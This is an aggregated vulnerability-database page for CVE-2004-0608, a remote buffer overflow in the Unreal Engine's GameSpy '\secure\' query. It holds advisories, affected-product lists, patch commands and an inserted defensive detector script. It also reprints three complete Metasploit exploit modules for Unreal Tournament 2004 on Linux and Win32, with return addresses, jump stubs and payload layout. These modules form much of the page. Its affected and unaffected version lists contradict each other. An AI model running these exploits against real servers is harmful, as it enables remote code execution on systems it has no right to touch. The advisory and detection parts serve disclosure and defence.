CVE-2004-0608
CVSS 10.0
Published: 2004-12-06 00:00:00
Last revised: 2016-10-17 22:46:40

[Original] The Unreal Engine, as used in DeusEx 1.112fm and earlier, Devastation 390 and earlier, Mobile Forces 20000 and earlier, Nerf Arena Blast 1.2 and earlier, Postal 2 1337 and earlier, Rune 107 and earlier, Tactical Ops 3.4.0 and earlier, Unreal 1 226f and earlier, Unreal II XMP 7710 and earlier, Unreal Tournament 451b and earlier, Unreal Tournament 2003 2225 and earlier, Unreal Tournament 2004 before 3236, Wheel of Time 333b and earlier, and X-com Enforcer, allows remote attackers to execute arbitrary code via a UDP packet containing a secure query with a long value, which overwrites memory.


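[CNNVD] Epic Games Unreal Engine Secure Query buffer overflow vulnerability (CNNVD-200412-011)

        The Unreal Engine is a network game engine used by many games.
        The Unreal Engine has a vulnerability in the way it handles game requests; a remote attacker may exploit it to execute arbitrary commands on the game server or cause a denial of service.
        The Unreal Engine does not correctly handle a malformed GameSpy 'secure' request that carries an overlong parameter; with an overlong request a remote attacker causes memory corruption and may execute arbitrary commands.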
        

- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:epic_games:unreal_tournament_2003:2199_macos
cpe:/a:epic_games:unreal_tournament_2003:2225_win32
cpe:/a:epic_games:unreal_engine:226f
cpe:/a:epic_games:unreal_tournament_2004:macos
cpe:/a:running_with_scissors:postal_2:1337
cpe:/a:epic_games:unreal_tournament:451b
cpe:/a:epic_games:unreal_tournament_2003:2225_macos
cpe:/a:dreamforge:tnn_outdoors_pro_hunter
cpe:/a:epic_games:unreal_tournament_2004:win32
cpe:/a:infogrames:x-com_enforcer
cpe:/o:gentoo:linux:1.4 (Gentoo Linux 1.4)
cpe:/a:nerf_arena_blast:nerf_arena_blast:1.2
cpe:/a:epic_games:unreal_engine:436
cpe:/a:infogrames:tacticalops:3.4
cpe:/a:epic_games:unreal_engine:433
cpe:/a:epic_games:unreal_tournament_2003:2199_linux
cpe:/a:epic_games:unreal_tournament_2003:2199_win32
cpe:/a:ion_storm:deusex:1.112_fm
cpe:/a:rage_software:mobile_forces:20000.0
cpe:/a:robert_jordan:wheel_of_time:333.0b
cpe:/a:arush:devastation:390.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0608
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0608
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-011
(official data source) CNNVD

- Other links and resources

http://aluigi.altervista.org/adv/unsecure-adv.txt
(VENDOR_ADVISORY)  MISC  http://aluigi.altervista.org/adv/unsecure-adv.txt
http://marc.info/?l=bugtraq&m=108787105023304&w=2
(UNKNOWN)  BUGTRAQ  20040618 Code execution in the Unreal Engine through \secure\ packet
http://www.gentoo.org/security/en/glsa/glsa-200407-14.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200407-14
http://www.securityfocus.com/bid/10570
(VENDOR_ADVISORY)  BID  10570
http://xforce.iss.net/xforce/xfdb/16451
(VENDOR_ADVISORY)  XF  unreal-secure-query-command-execute(16451)

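- Vulnerability information

Epic Games Unreal Engine Secure Query buffer overflow vulnerability
Critical  Boundary condition error
2004-12-06 00:00:00 2005-10-20 00:00:00
Remote

        The Unreal Engine is a network game engine used by many games.
        The Unreal Engine has a vulnerability in the way it handles game requests; a remote attacker may exploit it to execute arbitrary commands on the game server or cause a denial of service.
        The Unreal Engine does not correctly handle a malformed GameSpy 'secure' request that carries an overlong parameter; with an overlong request a remote attacker causes memory corruption and may execute arbitrary commands.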

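- Advisories and patches

        Vendor patch:
        Epic Games
        ----------
        The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:

        http://www.epicgames.com/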

- Vulnerability information (10032)

Unreal Tournament 2004 "Secure" Overflow (EDBID:10032)
linux remote
2004-07-18 Verified
7787 onetwo
N/A
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Unreal Tournament 2004 "secure" Overflow (Linux)',
			'Description'    => %q{
				
			This is an exploit for the GameSpy secure query in
			the Unreal Engine.

			This exploit only requires one UDP packet, which can
			be both spoofed and sent to a broadcast address.
			Usually, the GameSpy query server listens on port 7787,
			but you can manually specify the port as well.

			The RunServer.sh script will automatically restart the
			server upon a crash, giving us the ability to
			bruteforce the service and exploit it multiple
			times. 
					
			},
			'Author'         => [ 'onetwo' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
				    	[ 'CVE', '2004-0608'],
					[ 'OSVDB', '7217'],
					[ 'BID', '10570'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x5c\x00",

				},
			'Platform'       => 'linux',
			'Targets'        => 
				[
					['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer
					['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],
				],
			'DisclosureDate' => 'Jun 18 2004'))

			register_options(
				[
					Opt::RPORT(7787)
				], self.class)
	end
		
	def exploit
		connect_udp
		
		buf = make_nops(1024)
		buf[24, 4] = [target['Rets'][1]].pack('V')
		buf[44, 4] = [target['Rets'][0]].pack('V')
		buf[56, 4] = [target['Rets'][1]].pack('V')	
		buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP
		
		buf[0,  8] = "\\secure\\"
		buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded
	
		udp_sock.put(buf)	
		
		handler
		disconnect_udp
	end
	
	def ut_version
		connect_udp
		udp_sock.put("\\basic\\")
		res = udp_sock.recvfrom(8192)
		disconnect_udp	
		
		if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
			return m[1]
		end
		
		return
	end
	
	def check
		vers = ut_version
		
		if (not vers)
			print_status("Could not detect Unreal Tournament Server")
			return
		end
		
		print_status("Detected Unreal Tournament Server Version: #{vers}")
		if (vers =~ /^(3120|3186|3204)$/)
			print_status("This system appears to be exploitable")
			return Exploit::CheckCode::Appears
		end
		
		
		if (vers =~ /^(2...)$/)
			print_status("This system appears to be running UT2003")
			return Exploit::CheckCode::Detected
		end
		
		print_status("This system appears to be patched")
		return Exploit::CheckCode::Safe
	end

end
		

- Vulnerability information (16693)

Unreal Tournament 2004 "secure" Overflow (Win32) (EDBID:16693)
windows remote
2010-09-20 Verified
7787 metasploit
N/A
##
# $Id: ut2004_secure.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Unreal Tournament 2004 "secure" Overflow (Win32)',
			'Description'    => %q{

			This is an exploit for the GameSpy secure query in
			the Unreal Engine.

			This exploit only requires one UDP packet, which can
			be both spoofed and sent to a broadcast address.
			Usually, the GameSpy query server listens on port 7787,
			but you can manually specify the port as well.

			The RunServer.sh script will automatically restart the
			server upon a crash, giving us the ability to
			bruteforce the service and exploit it multiple
			times.

			},
			'Author'         => [ 'stinko' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2004-0608'],
					[ 'OSVDB', '7217'],
					[ 'BID', '10570'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x5c\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['UT2004 Build 3186', { 'Rets' => [ 0x10184be3, 0x7ffdf0e4 ] }], # jmp esp
				],
			'DisclosureDate' => 'Jun 18 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(7787)
			], self.class)

	end

	def exploit
		connect_udp

		buf = make_nops(1024)
		buf[0, 60] = [target['Rets'][0]].pack('V') * 15
		buf[54, 4] = [target['Rets'][1]].pack('V')
		buf[0,  8] = "\\secure\\"
		buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded

		udp_sock.put(buf)

		handler
		disconnect_udp
	end

	def ut_version
		connect_udp
		udp_sock.put("\\basic\\")
		res = udp_sock.recvfrom(8192)
		disconnect_udp

		if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
			return m[1]
		end

		return
	end

	def check
		vers = ut_version

		if (not vers)
			print_status("Could not detect Unreal Tournament Server")
			return
		end

		print_status("Detected Unreal Tournament Server Version: #{vers}")
		if (vers =~ /^(3120|3186|3204)$/)
			print_status("This system appears to be exploitable")
			return Exploit::CheckCode::Appears
		end


		if (vers =~ /^(2...)$/)
			print_status("This system appears to be running UT2003")
			return Exploit::CheckCode::Detected
		end

		print_status("This system appears to be patched")
		return Exploit::CheckCode::Safe
	end

end
		

- Vulnerability information (16848)

Unreal Tournament 2004 "secure" Overflow (Linux) (EDBID:16848)
linux remote
2010-09-20 Verified
0 metasploit
N/A
##
# $Id: ut2004_secure.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Unreal Tournament 2004 "secure" Overflow (Linux)',
			'Description'    => %q{
					This is an exploit for the GameSpy secure query in
				the Unreal Engine.

				This exploit only requires one UDP packet, which can
				be both spoofed and sent to a broadcast address.
				Usually, the GameSpy query server listens on port 7787,
				but you can manually specify the port as well.

				The RunServer.sh script will automatically restart the
				server upon a crash, giving us the ability to
				bruteforce the service and exploit it multiple
				times.
			},
			'Author'         => [ 'onetwo' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2004-0608'],
					[ 'OSVDB', '7217'],
					[ 'BID', '10570'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x5c\x00",

				},
			'Platform'       => 'linux',
			'Targets'        =>
				[
					['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer
					['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],
				],
			'DisclosureDate' => 'Jun 18 2004'))

		register_options(
			[
				Opt::RPORT(7787)
			], self.class)
	end

	def exploit
		connect_udp

		buf = make_nops(1024)
		buf[24, 4] = [target['Rets'][1]].pack('V')
		buf[44, 4] = [target['Rets'][0]].pack('V')
		buf[56, 4] = [target['Rets'][1]].pack('V')
		buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP

		buf[0,  8] = "\\secure\\"
		buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded

		udp_sock.put(buf)

		handler
		disconnect_udp
	end

	def ut_version
		connect_udp
		udp_sock.put("\\basic\\")
		res = udp_sock.recvfrom(8192)
		disconnect_udp

		if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
			return m[1]
		end

		return
	end

	def check
		vers = ut_version

		if (not vers)
			print_status("Could not detect Unreal Tournament Server")
			return
		end

		print_status("Detected Unreal Tournament Server Version: #{vers}")
		if (vers =~ /^(3120|3186|3204)$/)
			print_status("This system appears to be exploitable")
			return Exploit::CheckCode::Appears
		end


		if (vers =~ /^(2...)$/)
			print_status("This system appears to be running UT2003")
			return Exploit::CheckCode::Detected
		end

		print_status("This system appears to be patched")
		return Exploit::CheckCode::Safe
	end

end
		

- Vulnerability information (F82230)

Unreal Tournament 2004 Overflow (PacketStormID:F82230)
2009-10-27 00:00:00
onetwo  
exploit,udp,spoof
CVE-2004-0608

This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times.


- Vulnerability information

7217
Unreal Engine Secure Query Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public, Exploit Commercial

- Vulnerability description

The Unreal Engine contains a flaw that may be exploited by a malicious user to cause a buffer overflow. The issue is triggered when a remote attacker sends an excessively long value to a game server via the GameSpy 'secure' query protocol. It is possible that the flaw may allow remote code execution or denial of service.

- Timeline

2004-06-18 2004-05-24
2004-06-18 Unknown

- Solution

Upgrade to UnrealTournament 2004 version 3236 or higher, as it has been reported to fix this vulnerability. There are no other upgrades or patches known to fix the vulnerability at this time. It may be possible to correct the flaw or prevent exploitation by implementing one or more workaround(s). Links are provided as Other Solution URL's in the external references section.

- Related references

- Vulnerability author

- Vulnerability information

Epic Games Unreal Engine Memory Corruption Vulnerability
Boundary Condition Error 10570
Yes No
2004-06-18 12:00:00 2009-07-12 05:16:00
Discovery is credited to Luigi Auriemma <aluigi@autistici.org>.

- Affected program versions

Running With Scissors Postal 2 1337
Robert Jordan Wheel of Time 333.0 b
Rage Software Mobile Forces 20000.0
Nerf Arena Blast Nerf Arena Blast 1.2
Ion Storm DeusEx 1.112 fm
Infogrames X-com Enforcer
Infogrames TacticalOps 3.4
Gentoo Linux 1.4
Epic Games Unreal Tournament 3 1.3beta4
Epic Games Unreal Tournament 2004 win32
Epic Games Unreal Tournament 2004 macOS
Epic Games Unreal Tournament 2003 2225 win32
Epic Games Unreal Tournament 2003 2225 macOS
Epic Games Unreal Tournament 2003 2199 win32
Epic Games Unreal Tournament 2003 2199 macOS
Epic Games Unreal Tournament 2003 2199 linux
Epic Games Unreal Engine 436
+ ARUSH Devastation 390.0
+ ARUSH Devastation 381.0
+ ARUSH Devastation 380.0
+ Atari Magic The Gathering: Battlegrounds 1.4
+ Atari Magic The Gathering: Battlegrounds 1.3
+ Atari Magic The Gathering: Battlegrounds 1.2
+ Atari Magic The Gathering: Battlegrounds 1.1
+ Atari Magic The Gathering: Battlegrounds 1.0
+ Atari Nerf Arena Blast
+ Eidos DeusEx 1.2
+ Eidos DeusEx 1.1
+ Eidos DeusEx 1.0
+ Human Head Studios Rune 1.0.1
+ Human Head Studios Rune 1.0
+ Microprose Software Star Trek: Klingon Honor Guard
+ Microprose Software Tactical Ops 3.4
+ Microprose Software Tactical Ops 3.3
+ Microprose Software Tactical Ops 3.2
+ Microprose Software Tactical Ops 3.1
+ Microprose Software Tactical Ops 3.0
+ Rage Software Mobile Forces
+ Running With Scissors Postal 2
+ UBI Soft Rainbow Six: Raven Shield 1.5
+ UBI Soft Rainbow Six: Raven Shield 1.4
+ UBI Soft Rainbow Six: Raven Shield 1.3
+ UBI Soft Rainbow Six: Raven Shield 1.2
+ UBI Soft Rainbow Six: Raven Shield 1.1
+ UBI Soft Rainbow Six: Raven Shield 1.0
+ United States Department of Defense America's Army 2.0 .0
+ United States Department of Defense America's Army: SFAS 2.0 .0a
+ United States Department of Defense America's Army: SFAS 1.9 .0
Epic Games Unreal Engine 3
Epic Games Unreal Engine 226f
DreamForge TNN Outdoors Pro Hunter
ARUSH Devastation 390.0
United States Department of Defense America's Army: SFAS 2.0 .0a
United States Department of Defense America's Army: SFAS 1.9 .0
United States Department of Defense America's Army 2.0 .0
UBI Soft XIII
UBI Soft Splinter Cell Pandora Tomorrow
UBI Soft Rainbow Six: Raven Shield 1.5
UBI Soft Rainbow Six: Raven Shield 1.4
UBI Soft Rainbow Six: Raven Shield 1.3
UBI Soft Rainbow Six: Raven Shield 1.2
UBI Soft Rainbow Six: Raven Shield 1.1
UBI Soft Rainbow Six: Raven Shield 1.0
Microprose Software Star Trek: Klingon Honor Guard
Human Head Studios Dead Man's Hand
Epic Games Unreal Tournament 2004 3236
Atari Magic The Gathering: Battlegrounds 1.4
Atari Magic The Gathering: Battlegrounds 1.3
Atari Magic The Gathering: Battlegrounds 1.2
Atari Magic The Gathering: Battlegrounds 1.1
Atari Magic The Gathering: Battlegrounds 1.0

- Unaffected program versions

United States Department of Defense America's Army: SFAS 2.0 .0a
United States Department of Defense America's Army: SFAS 1.9 .0
United States Department of Defense America's Army 2.0 .0
UBI Soft XIII
UBI Soft Splinter Cell Pandora Tomorrow
UBI Soft Rainbow Six: Raven Shield 1.5
UBI Soft Rainbow Six: Raven Shield 1.4
UBI Soft Rainbow Six: Raven Shield 1.3
UBI Soft Rainbow Six: Raven Shield 1.2
UBI Soft Rainbow Six: Raven Shield 1.1
UBI Soft Rainbow Six: Raven Shield 1.0
Microprose Software Star Trek: Klingon Honor Guard
Human Head Studios Dead Man's Hand
Epic Games Unreal Tournament 2004 3236
Atari Magic The Gathering: Battlegrounds 1.4
Atari Magic The Gathering: Battlegrounds 1.3
Atari Magic The Gathering: Battlegrounds 1.2
Atari Magic The Gathering: Battlegrounds 1.1
Atari Magic The Gathering: Battlegrounds 1.0

- Vulnerability discussion

Unreal Engine is reportedly prone to a memory corruption vulnerability. This issue presents itself when a remote attacker sends an excessive value to a vulnerable game server through a '\secure\' query.

An attacker can exploit this issue to potentially overwrite sensitive memory addresses leading to a variety of attacks including denial of service and possible remote code execution.
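
A defensive check for the oversized '\secure\' value described above, as an added example that is not part of the original advisory or of the Metasploit modules on this page. The 16-byte limit, the printable-ASCII rule, the function names and the sample datagrams are assumptions constructed for illustration; the page does not state the legitimate length of a challenge value.

```ruby
# Added example: flag GameSpy-style query datagrams whose \secure\ value is
# longer than a legitimate challenge is assumed to be.

# Assumption: upper bound for a legitimate challenge value. The page gives no
# figure, so tune this against traffic from your own servers.
MAX_SECURE_LEN = 16

# Split a backslash-delimited query ("\key\value\key\value") into pairs.
# Works on raw bytes so non-printable data cannot break the parser.
def parse_query(datagram)
  data = datagram.dup.force_encoding(Encoding::BINARY)
  return [] unless data.start_with?("\\")
  fields = data[1..-1].split("\\", -1)
  fields.each_slice(2).map { |key, value| [key.downcase, value.to_s] }
end

# Return the findings for one UDP payload; an empty list means nothing flagged.
def inspect_datagram(datagram, max_len: MAX_SECURE_LEN)
  findings = []
  parse_query(datagram).each do |key, value|
    next unless key == "secure"
    len = value.bytesize
    findings << { rule: :oversized_secure_value, length: len } if len > max_len
    # Assumption: a legitimate challenge is printable ASCII.
    if value.bytes.any? { |b| b < 0x20 || b > 0x7e }
      findings << { rule: :non_printable_secure_value, length: len }
    end
  end
  findings
end

# Constructed sample traffic (not captured from a real server):
# source address, destination port, UDP payload.
SAMPLES = [
  ["192.0.2.10", 7787, "\\basic\\"],
  ["192.0.2.11", 7787, "\\secure\\ABCDEF"],
  ["192.0.2.66", 7787, "\\secure\\" + "A" * 1016],
  ["192.0.2.67", 7787, "\\info\\\\secure\\" + "\xff".b * 64],
].freeze

# Turn every finding into one alert line suitable for a log pipeline.
def scan(samples)
  samples.flat_map do |src, port, payload|
    inspect_datagram(payload).map do |f|
      "ALERT src=#{src} dport=#{port} rule=#{f[:rule]} len=#{f[:length]}"
    end
  end
end

puts scan(SAMPLES) if __FILE__ == $PROGRAM_NAME
```

The page notes that the triggering packet can be spoofed and sent to a broadcast address, so treat the source address in an alert as a hint rather than attribution.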

- Exploit

A proof of concept is available at the following location:
http://aluigi.altervista.org/poc/unsecure.zip

An exploit has been released for this issue as part of the Metasploit Framework project version 2.2. Various other exploits have been released as well. Please see the Metasploit exploits site in Web references for more information.

Exploit code for the Linux platform is available as well.

- Solution

It is reported that Patch 3236 addresses this problem in Unreal Tournament 2004.

Gentoo Linux has released advisory GLSA 200407-14 addressing this issue. Please see the referenced advisory for further information. Users of affected packages are urged to execute the following command as the superuser:
emerge sync

Then, depending on the package(s) currently installed, execute the appropriate following commands as superuser:
emerge -pv ">=games-fps/ut2003-2225-r3"
emerge ">=games-fps/ut2003-2225-r3"
emerge -pv ">=games-server/ut2003-ded-2225-r2"
emerge ">=games-server/ut2003-ded-2225-r2"
emerge -pv ">=games-fps/ut2004-3236"
emerge ">=games-fps/ut2004-3236"
emerge -pv ">=games-fps/ut2004-demo-3120-r4"
emerge ">=games-fps/ut2004-demo-3120-r4"

Currently we are not aware of any other vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.


Epic Games Unreal Tournament 2004 macOS

Epic Games Unreal Tournament 2004 win32

- Related references

 

 
